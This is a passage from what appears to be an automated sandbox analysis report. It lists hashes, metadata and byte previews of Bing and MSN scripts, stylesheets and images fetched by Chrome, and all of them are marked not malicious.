                                                                                                                                                                                                                                                                        SHA-512:6A575205C83B1FC3BFAC164828FBDB3A25EAD355A6071B7D443C0F8AB5796FE2601C48946C2E4C9915E08AD14106B4A01D2FCD534D50EA51C4BC88879D8BEC8D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:var wln=wln||"",Identity;(function(n){function i(n){n.style.display="none";n.setAttribute("aria-hidden","true")}function r(n){n.style.display="inline-block";n.setAttribute("aria-hidden","false")}var u,t;n&&n.sglid&&n.setLoginPreference&&sj_be&&sj_cook&&sj_evt&&_d&&typeof _d.querySelectorAll!="undefined"&&(u=function(n){var i=n.getAttribute("data-a"),t=n.getAttribute("data-p");i==="false"&&t!=null&&sj_be(n,"click",function(){sj_cook.set("SRCHUSR","POEX",t,!0,"/")})},sj_evt.bind("identityHeaderShown",function(){var n=!1;sj_be(_ge("id_l"),"click",function(){var i,t;if(!n){for(i=_d.querySelectorAll(".b_imi"),t=0;t<i.length;t++)u(i[t]);n=!0}})},!0));sj_evt&&n&&(t=function(t){var h;if(t==null||t.idp!=="orgid"||(h=n.wlProfile(),h==null||h.name==null||t.name!=null)){var e=_ge("id_n"),u=_ge("id_p"),o=_ge("id_s"),s=_ge("id_a"),f=t?t.displayName:wln,c=t?t.img:null,l=t?t.idp:null,a=t?t.cid:null;e&&s&&(a||f)?(u&&c&&(u.title=f,u.src=c,r(u)),f.length>10&&(f=f.substring(0,10).replace(/\s+$/,"")+".")
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1051), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1051
                                                                                                                                                                                                                                                                        Entropy (8bit):5.354709142801451
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:2QmZ6qv3dhazSaxa7onMZN1GqPTz0KmNn4zVAoL3tMTCDU1FA9zR9uHemdXp:2Om74MZN1tPv0KmNjAtMGDTzRPo
                                                                                                                                                                                                                                                                        MD5:F76D06D7669E399DC0788BC5473562BB
                                                                                                                                                                                                                                                                        SHA1:159293D99346A27E2054A812451909DE832CA0D1
                                                                                                                                                                                                                                                                        SHA-256:23F0357AE77648EE38F39960E56507D87F8D690C48E759A0E054F6E691C843EC
                                                                                                                                                                                                                                                                        SHA-512:F5BA3C997F980A2B3DA8B93D0DFF351FA6796BAA705E7831F9EFED24A6C4F0FAAF84CC7F31AC5DAC8A8D05D8D0491ECCD03EDF5892B28B639CBB107271FEB893
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:(function(){function t(t){typeof Log!==n&&typeof Log.Log!==n&&Log.Log("NcHeader","Rewards",t,!0)}function i(){var u,e,r,a,o,v,y,s,i,h;if(typeof bepcfg===n)t("bepcfg Undefined");else if(u=_ge("nc_iid"),u){var c=typeof bepcfg.wb!==n,l=typeof bepcfg.v!==n,f=u.getAttribute("_IG");if(f&&f.length||(f=_G.IG),e="&IID="+u.getAttribute("_iid")+"&IG="+f,l)try{sj_cook.get("")}catch(p){e+="&CID="+u.getAttribute("_cid")}r="/rewardsapp/ncheader?ver="+_G.AppVer+e;a=r;try{o=undefined;v=/(^|&)uncrunched=1(&|$)/i;o=v.exec(_w.location.search.substr(1));r=r+(o?"&uncrunched=1":"")}catch(w){r=a}y=_ge("rewardsEntryPoint");y&&(r="".concat(r,"&loadEntryPointsScript=1"));s=[_w.top,_w];i=sj_gx();i.open("POST",r,!0);i.setRequestHeader("Content-type","application/x-www-form-urlencoded");c&&(i.onreadystatechange=function(){i&&i.readyState==4&&i.status==200&&sj_appHTML(sj_b,i.responseText)});h="wb="+(c?bepcfg.wb:"0");l&&(h+=";i="+(s[0]!==s[1].self?0:1)+";v="+bepcfg.v);i.send(h)}else t("nc_iid NotFound")}var n="undefi
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                                                        Entropy (8bit):7.297687791356906
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:6v/7PHK5vmTHief+oUXQzBw0Kqp90+JZ8WDJhg0XYkDBwOY:Mq5vmxf+oUXQlvxT0+JHNztY
                                                                                                                                                                                                                                                                        MD5:BDB31A2F26EA362FB3CF71D59021BA62
                                                                                                                                                                                                                                                                        SHA1:7CD518B87EBEBEA1694D08EB79C66531B2806715
                                                                                                                                                                                                                                                                        SHA-256:5EC6996DFBC761C63BC244CE4ADC104541E399DB02D9EDBDF673450CEBA75A2E
                                                                                                                                                                                                                                                                        SHA-512:8A92C8746DC103C5BE51A807984E126DE65CDD231989AD929FAD052E3BE66543726CC2B045B6E5673A62BEEBDED1B9E0D4959A55158489E4EB8ABE5F812903CD
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1d0ujS.img?w=16&h=16&q=100&m=6&f=png&u=t
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+......IDATx..R..AQ.].........U..F..z.@..$.....9..F".....B.o...5ss.=87.;..k..Y.=3..ax.h4B.T".f2..X,..d4J.\....Bc.....4..5S.6J&g$... .l6.j..*..;....z..dRRR..r..F..@ .|>/.^A".......*....0..hT.O..V.U..f.`..B.......-.z..^/<..N....d.\.........a,.K....!...^....x.Z<..b.d2.-c.X4....#.J.-.6J..l0......V..f..&...~*8.........zS....r..<.P(......n..n.....N.}..o.....v.!4.x<.|>G6...`..j.x...s.S2.R.2.Q#{.....v...q<.q..`.X$g..y..N..2.._....IEND.B`...............
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (17377), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):17377
                                                                                                                                                                                                                                                                        Entropy (8bit):5.2783776268189255
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:3Wsj/9NFzdlfOw3QMXEwOAw3KvyBJeXi5OFvKh12tqRxW+:3z/PFzdzXEwCanXigFvKh1SW3
                                                                                                                                                                                                                                                                        MD5:11ADDDD4A61714E7DC173B0FCC2CDC71
                                                                                                                                                                                                                                                                        SHA1:4CCC5FBDEA47DF0BD5EDDF4A86443A2F1ADB1B34
                                                                                                                                                                                                                                                                        SHA-256:C64240AF9771BA3742BF06198EA33BBA40CAA0AA93FE1B9574B3345D372A8E82
                                                                                                                                                                                                                                                                        SHA-512:22FC44E2C2950579443743AC95081540667BB9D8287BF4DD0B3D68468FAC8411D25B1B6E6BCFCD86EEF7437C2C6CA77B7BB579778FDEF343EF589C9CA7C828A4
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/rp/TMxfvepH3wvV7d9KhkQ6LxrbGzQ.js
                                                                                                                                                                                                                                                                        Preview:var customEvents,__spreadArray,fallbackReplay,EventLoggingModule;_w.EventsToDuplicate=[];_w.useSharedLocalStorage=!1;define("shared",["require","exports"],function(n,t){function s(n,t){for(var r=n.length,i=0;i<r;i++)t(n[i])}function r(n){for(var i=[],t=1;t<arguments.length;t++)i[t-1]=arguments[t];return function(){n.apply(null,i)}}function u(n){i&&event&&(event.returnValue=!1);n&&typeof n.preventDefault=="function"&&n.preventDefault()}function f(n){i&&event&&(event.cancelBubble=!0);n&&typeof n.stopPropagation=="function"&&n.stopPropagation()}function e(n,t,i){for(var r=0;n&&n.offsetParent&&n!=(i||document.body);)r+=n["offset"+t],n=n.offsetParent;return r}function o(){return(new Date).getTime()}function h(n){return i?event:n}function c(n){return i?event?event.srcElement:null:n.target}function l(n){return i?event?event.fromElement:null:n.relatedTarget}function a(n){return i?event?event.toElement:null:n.relatedTarget}function v(n,t,i){while(n&&n!=(i||document.body)){if(n==t)return!0;n=n.p
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 32 x 32, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):308
                                                                                                                                                                                                                                                                        Entropy (8bit):6.593727490677001
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:6v/lhPk+nD1v427BaK+V1dv340ikehD09kEKBtUsu87sCLQKpRVp:6v/7sG1vU1l3PehASTYstSKpR7
                                                                                                                                                                                                                                                                        MD5:BDA49766E2E7E028EF09D0E34988ECDF
                                                                                                                                                                                                                                                                        SHA1:73FED2C00C224AA0DF89397EC41488D63975C882
                                                                                                                                                                                                                                                                        SHA-256:5CBDA906C7DB6D50C7E200D73841A7BB7404BCFF1B3C9121AA5BC79DBC608B9A
                                                                                                                                                                                                                                                                        SHA-512:2292945B9F53D495B9845CDE7FDDDC6890EDBF00262314691BDC609D81DD6521AD3BB687766A2291077A1848EF49BD04A430C96503EB3254DAD6E932963C9ABD
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR... ... .....D......9PLTEGpL.n..n..p..n..n..m..p..p..n..o..o..n..o..n..o..n..n..n...T....tRNS... ..@.................IDAT8.....0.D.gZ.....5..x.t.YM...r(.....)...O-._.R..r#...[O.o..e.\......(...h..}...h.=.?_Q...#..Iu!o6.u.-....W.0......aT..Ai...........A?.~..t.q....V......IEND.B`.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):35714
                                                                                                                                                                                                                                                                        Entropy (8bit):7.962594488900293
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:e9D1ptrOrtPx20J/UVlwr4wGVg3+/9AAlO8t0bNvH/sg:e9xwtPFBVr+W+/ySj0hvHd
                                                                                                                                                                                                                                                                        MD5:8D41C5A4C46DDE9D8B890D2C89CACA75
                                                                                                                                                                                                                                                                        SHA1:A3AF821C8B24164DE51A8714137B7FBF4D698519
                                                                                                                                                                                                                                                                        SHA-256:6370F2380DD0B7018DD5BD7A15459DD6440935E6F56E5DDD95E98803883E7824
                                                                                                                                                                                                                                                                        SHA-512:67E7EDFF8DDCA2B3A28FD64A533D24046F14E97CEA5FDEFA4FB997C20257D2EA43E4CCBA5184EDF3B536E6D160327E4C02C239CB56BEA32B6752E44D704BD40C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://th.bing.com/th?id=ORMS.582b399d114f52e8f3cee6331a006f9f&pid=Wdp&w=300&h=225&qlt=90&c=1&rs=1
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....F....ss..%.q;.I.7(\q..'.{.....G.t......U+.mfp..M.1....#.....9..~..Wz..!.....8P;d..../..I....n..n..@..V.....0.?..y..mW.(*{.Yn[F.$.-../..>.}gwl...mu.I...P\&...N.p..N.Gz......4..._.t...h...|.Yd..dE..|..$q.....t...ho....k$.kw^cwh..d....?.|..i.m.m.(.hd.d..9.9.^.<eJ5{.m8.3.;..o..........Cik#...9Sl..Rv}.pOR:..hF.....j...*.........0...........3.....L...^.....
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):242
                                                                                                                                                                                                                                                                        Entropy (8bit):4.86807996961474
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:A909cpDUDUBDhR9c2p83QVhXANO09c8k9Au9c2pHn:AocpwDUBhfc2W3YXANvcpiMc2Bn
                                                                                                                                                                                                                                                                        MD5:6C2C6DB3832D53062D303CDFF5E2BD30
                                                                                                                                                                                                                                                                        SHA1:B7A064A64CEAE5C9009EF7D6D8F63B90D3933C9D
                                                                                                                                                                                                                                                                        SHA-256:06B77EE16A2CD34ACD210B4F2B6E423762EA8874BB26AE5A37DB9DD01A00FF70
                                                                                                                                                                                                                                                                        SHA-512:BC2D115B53035B700D727AF9D7EFAF32DD2A39A2344F3F5FA1A82586BE849EC7803E8320661E66AB7DD2A17E64B7897E95BBD84502B91997FA46EBA4E67E8C7D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/t6Bkpkzq5ckAnvfW2PY7kNOTPJ0.js
                                                                                                                                                                                                                                                                        Preview:function RewardsReportActivity(n){window.sj_rra&&sj_rra(n)}(function(){RewardsReportActivity(document.URL);sj_evt&&sj_evt.bind("acclink:updated",function(){typeof RewardsReportActivity!="undefined"&&RewardsReportActivity(document.URL)},1)})()
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3596), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):3596
                                                                                                                                                                                                                                                                        Entropy (8bit):5.2939962074462805
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:Ldz+BIRGjYmysS9pdsgKy0IFzy0TXlQvjlXJDSQhB6DxYv2ayNJes:LdSBIxmysS9DEyTFzyYXOjlXJDdGYuay
                                                                                                                                                                                                                                                                        MD5:7658C31C6AF408FF6C9F01B507B41C7C
                                                                                                                                                                                                                                                                        SHA1:C77922DE59099D8545A7C4D4B9AA46B2675B31D0
                                                                                                                                                                                                                                                                        SHA-256:145832FE4C30FFCDD88EACF2A42B3C894FD21A6CD15AC3CAD867AEA578EE3A70
                                                                                                                                                                                                                                                                        SHA-512:7B83581D551F875C0F88E4B5D4CBC7F60EA7EB6AD675F9C7EBA935714017BC1430A32641B2D74C275C102144DC1AC8BE5C80E91A6F9162B9ABC4C29D8DE1B6DF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/sa/41714962/Blue/BlueIdentityDropdownRedirect_c.js
                                                                                                                                                                                                                                                                        Preview:var Identity=Identity||{};Identity.headerAuthenticate=function(n,t){Identity.headerLoginMode!=0&&Identity.popupAuthenticate(n,"","EXPLICIT_P")||(_w.location.href=t)},function(){function h(n,t,i){if(n&&t){var r=n.className;i?r.indexOf(t)==-1&&(r=r.concat(" ",t)):r=r.replace(t,"");n.className=r}}function g(n){for(var i,r,u,e,o=n.getElementsByTagName("script"),f=[],t=0;t<o.length;t++)f.push(o[t]);for(t=0;t<f.length;t++){for(i=f[t],r=document.createElement("script"),u=0;u<i.attributes.length;u++)e=i.attributes[u],r.setAttribute(e.name,e.value);r.appendChild(document.createTextNode(i.innerHTML));i.parentNode.replaceChild(r,i)}}function ut(n){n[1]!=="login"&&w(!1)}var u=_ge("id_h"),f=_ge("id_l"),t=_ge("id_d"),e,r=!1,c=!1,l=Identity.hdrClk,i=sj_gx(),a=!1,b="keyup",o="click",s="touchstart",v="focusChange",y=function(){var u,s,f,h;if(!r){r=!0;var v=t.getAttribute("_iid"),o="",n="testhooks=1";location.href.indexOf(n)>0&&(o="&"+n);u="";s="loginmode=1";Identity.headerLoginMode==1&&(u="&"+s);f="";n
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (26218)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):142570
                                                                                                                                                                                                                                                                        Entropy (8bit):5.462990367527485
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:IEtaLL0yN4ydBPGqePZQTCnjdd7YhUlazo9:IEtaLL0yN4ydBPGqePZQTsh9
                                                                                                                                                                                                                                                                        MD5:E96BEF1E036BF31975B5B2FD42C2F88C
                                                                                                                                                                                                                                                                        SHA1:83AA58A1D9FD51D521A2068799017BE65CCAB27F
                                                                                                                                                                                                                                                                        SHA-256:9C88F7FB48EEDCAFABE7820FEF8F539DA8619FE7575D1248219F8B29F90EAC23
                                                                                                                                                                                                                                                                        SHA-512:88F27B76F1DEEA7436324CAFA86C2D46388A3F88E7941AD5604DAC3B463577D45ED0FB4C6E8A6B3EB7BB30D525DE59F0B0F510853B8B35BF9D8595A93A73A9D1
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/bundles/v1/bingHomepage/latest/web-components_traffic-card_dist_index_js.e9e81366e8b3dd2305a9.js
                                                                                                                                                                                                                                                                        Preview:(self.webpackChunk_msnews_msnews_experiences=self.webpackChunk_msnews_msnews_experiences||[]).push([["web-components_traffic-card_dist_index_js"],{51603:function(e,t,i){"use strict";i.r(t),i.d(t,{TrafficCard:function(){return s.JX},maxSummaryItemsPerPage:function(){return s.My},msftTrafficCard:function(){return Ks},msftTrafficCommuteSettingPage:function(){return Be},msftTrafficImg:function(){return Me},msftTrafficToast:function(){return Qe},msftTransitImagePageSupersd:function(){return re},msftTransitLineItemsSupersd:function(){return M},msftTransitLinesPageSupersd:function(){return Y},msftTransitLocationsPageSupersd:function(){return z},msftTransitToastPageSupersd:function(){return ee},trafficCardStyles:function(){return Gs}});var s=i(1067),a=i(33940),o=i(67093),r=i(99452),n=i(42590),l=i(28904);class c extends l.H{constructor(){super(...arguments),this.transitData={},this.showHomeLocationSuggests=!1,this.showWorkLocationSuggests=!1,this.isSaveButtonDisabled=!0,this.isUserMsa=!1,this.h
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=6, xresolution=86, yresolution=94, resolutionunit=2, software=GIMP 2.10.18, datetime=2020:04:16 19:04:38], progressive, precision 8, 160x160, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):3791
                                                                                                                                                                                                                                                                        Entropy (8bit):7.08266375441937
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:6lg111b8TUEfN/R5Cx2ftlv8Zkj81vPZsYf:0g11u5FR5CUtlkZPRKY
                                                                                                                                                                                                                                                                        MD5:299A479A2F7F1F30D09545CA8CC5D162
                                                                                                                                                                                                                                                                        SHA1:871F9E79AD73AAD0B3E0AD1B5B6B87FE837B16CE
                                                                                                                                                                                                                                                                        SHA-256:B314EAD01E8E89C964273418BB1117D24DFE01E4838E7A1B46FA19F64699AF05
                                                                                                                                                                                                                                                                        SHA-512:9D8DA9F1247D5D097E8AAAB4346AADE12E2BC74D6F9446760A5A3A45D9C2D48782D456CE05AC6FD2F0572CD26A562F2D0E4C55048FDAEC138F398A715743437D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/hx-eea1zqtCz4K0bW2uH_oN7Fs4.jpg
                                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...............V...........^...(...........1.......f...2.......t...i...............H.......H.......GIMP 2.10.18..2020:04:16 19:04:38.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ .........7.,acspMSFT...................................-lcms................................................desc... ...@cprt...`...6wtpt........chad.......,rXYZ........bXYZ........gXYZ........rTRC....... gTRC....... bTRC....... chrm...4...$dmnd...X...$dmdd...|...$mluc............enUS...$.....G.I.M.P. .b.u.i.l.t.-.i.n. .s.R.G.Bmluc............enUS.........P.u.b.l.i.c. .D.o.m.a.i.n..XYZ ...............-sf32.......B.......%.......................nXYZ ......o...8.....XYZ ......$.........XYZ ......b.........para..........ff......Y.......[chrm..............T|..L.......&g...\mluc............enUS.........G.I.M.Pmluc............enUS.........s.R.G.B...C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 134 x 64, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):7441
                                                                                                                                                                                                                                                                        Entropy (8bit):7.961547902598206
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:u5AWFqvmUXx8GYnT/6M+wxWHWfkM6W+iBvH:e7M3BenT/6M+wxEWfk6B/
                                                                                                                                                                                                                                                                        MD5:C162A5D5C4B750769BF48752F6206FDA
                                                                                                                                                                                                                                                                        SHA1:52554BFC629CAAB91D215026785314781B9A0708
                                                                                                                                                                                                                                                                        SHA-256:89835F7C743F40ABECCB11C85E34FF17120CF0AF614327E527E5B37B01848FCF
                                                                                                                                                                                                                                                                        SHA-512:30EBB95F24A38ABFEAC7EFF24F6E61563355B40773DA85F059709A5D3F1F79C8AE7B52877F4B4CB64EB177C295DBA62DFBA2CA866C40398E9F6C57D285D65D10
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:"https://ecn.dev.virtualearth.net/REST/v1/Imagery/Map/RoadVibrant/Routes/driving?ms=134,64&culture=en-us&waypoint.1=38.7950210571289,-77.2733001708984;drsp.f;+&waypoint.2=38.8471221923828,-77.3063125610352;drep.f;+&mapLayer=TrafficFlow,Basemap,trafficroute,OsmBuildings&key=AugYTsAbLKj7moSUfsxalWlCFq3qnO8wjRy5Pp4tXwCpwW0gClh_Eq0gwMSHPcLK&fmt=png&da=ro&logo=n"
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR.......@.............PLTE.........................{|.......9_.(BW{|...."Jgyzz....._.....]w...N?...u..c .d]..I;.J......f....m5.d~|Jo..u..r...?......d~..j.j..fu.J...p..e{J.."x.SVOfWD.r..A....m9......!.H?.c..re.j...<.f-...!.s;..Z[Y..V%.fX.M.....p~<\..B.tG2.n4.cxy4....e..w.m[..W...y.9...,b...A\.j<.......v..;..C.t:.d%ndg....;.......5.\......>.sJ.b.._Z.z..$..!}.(#...d.#/. )....z...jk...... .yu9 .;8.$.....y..te....df.(,...5.Li..p.....Na]..........~Z.5F4.|...G.}}}|..@p1....2..p.s..L..WbJ........S@(...KqZ......rK.h.&.....-n.2..........r........rtp...x..0`....&,-.&.|...&..H..x.......887..s.d...5.z.......s.W..GHE...G/8.x...m....o+..!.{...S.......<...x.%.J...-CZ.:....R#.:..Z...k..dN$..g.....CN .}E.I..B.Q_B.c...x0.)A..zs....IDATh.]..\......._....../....c...,H.Z......'....X.v..$+...b..t.....nZ..*..=....V....6.Mr*.6n.....&....{.g......x.....~.../../........|.r}.@}6.p......td.gL ...w.f.x.v....>..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (610), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):610
                                                                                                                                                                                                                                                                        Entropy (8bit):4.975238914969193
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:iggpIYa1gjMPRuQR6uqTARSASBI4AM1mAu0AkgO3AiDMvTAD0xpmDOZH:IIbR6uqTARSnBP3EH0lgCmvTAS061
                                                                                                                                                                                                                                                                        MD5:F8A63D56887D438392803B9F90B4C119
                                                                                                                                                                                                                                                                        SHA1:993BD8B5EB0DB6170EA2B61B39F89FAD9BFEB5B5
                                                                                                                                                                                                                                                                        SHA-256:EF156B16FDCF73F670E7D402D4E7980F6558609A39195729F7A144F2D7329BF3
                                                                                                                                                                                                                                                                        SHA-512:26770BB2AC11B8B0AEF15A4027AF60A9C337FE2C69D79FDDAA41ACFD13CAC70096509B43DC733324932246C93475A701FD76A16675C8645E0EC91BD38D81C69D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/mTvYtesNthcOorYbOfifrZv-tbU.css
                                                                                                                                                                                                                                                                        Preview:#bepfo{background-color:#fff !important;color:#444 !important;z-index:10}#bepfo.b_hide{display:none !important}#bepfo.darkMode{background-color:#11100f !important;color:#edebe9 !important}#bepfo #bepfm{max-width:320px;overflow:hidden;box-sizing:border-box;border-radius:4px}.popup{transform:scale(0);transform-origin:center top;animation-name:autoOpenPopup;animation-duration:300ms;animation-delay:200ms;animation-timing-function:linear;animation-fill-mode:forwards}@keyframes autoOpenPopup{0%{transform:scale(0)}30%{transform:scale(.3)}50%{transform:scale(.5)}80%{transform:scale(.8)}100%{transform:scale(1)}}
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:59:08], progressive, precision 8, 160x160, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):5944
                                                                                                                                                                                                                                                                        Entropy (8bit):7.819206752415454
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:sUbkQe7dQVaRFmwmIE1KFxQ5JKPxCLNO8XrhNOyYSIyQ3DEmISwnFlE6NlG:s+od96rIE1KRCLHXl4DPzEmISwFlE6Nc
                                                                                                                                                                                                                                                                        MD5:F6E70DA298349AD94215F0B4A6875037
                                                                                                                                                                                                                                                                        SHA1:96F08A674EDB118B6862663ADA27CCCD56B44481
                                                                                                                                                                                                                                                                        SHA-256:68B6356BA9F37FF17EAE98BC094A493075F83D446B1E88F1ED32C2926E72E76C
                                                                                                                                                                                                                                                                        SHA-512:AFA16D89B1395F1318F42757F9451553F425539087E2EE40EC9FB14EC1FEB0C80254252951472ACC4AB8D4245E53E75F2C43FE41DAF9EC7DA8526C2F7B669BD4
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/lvCKZ07bEYtoYmY62ifMzVa0RIE.jpg
                                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:07:31 17:59:08....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;.........................................................................................h......................E..T..r..D........@..H.F&....`5.e.%...."..U@C.r.e...5.-.`4".[.`.1C.$)..pZ.".;. .(..w...x.f..*sU[....Y..<.:...b..=+.........n\.b)sv/4^`-.kN.;.v..X....Z......#_...N.....j..4.\......T..,.....B..&..L....^LcJ.KA.=....!iEY...!N....Z.:.d.i..F..d...sP.w=<..59]O..u.?..3...]i....F...C.X...[M..z..<...k..rL.UYr.jz.@ sTf..D8,5.+..<jWr..oL...<H.k;.A I.k)...'.y.j.uZ.,4......(.\HH.ByC..*1.jt.X...Z.......w......`.v.TZ.M.f.J.}.F.e..Te.-N@S...+.].\..u-9..Xg* .B.[M.$..'.ry....Zf...CV.D...S...65 `mH@#.j[.y."...r ).5.B\.o...B...Ee..Q@....,..)..u#..i.j.jAsT...[J.c_...'.....................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):469
                                                                                                                                                                                                                                                                        Entropy (8bit):4.629787805928795
                                                                                                                                                                                                                                                                        Encrypted:false
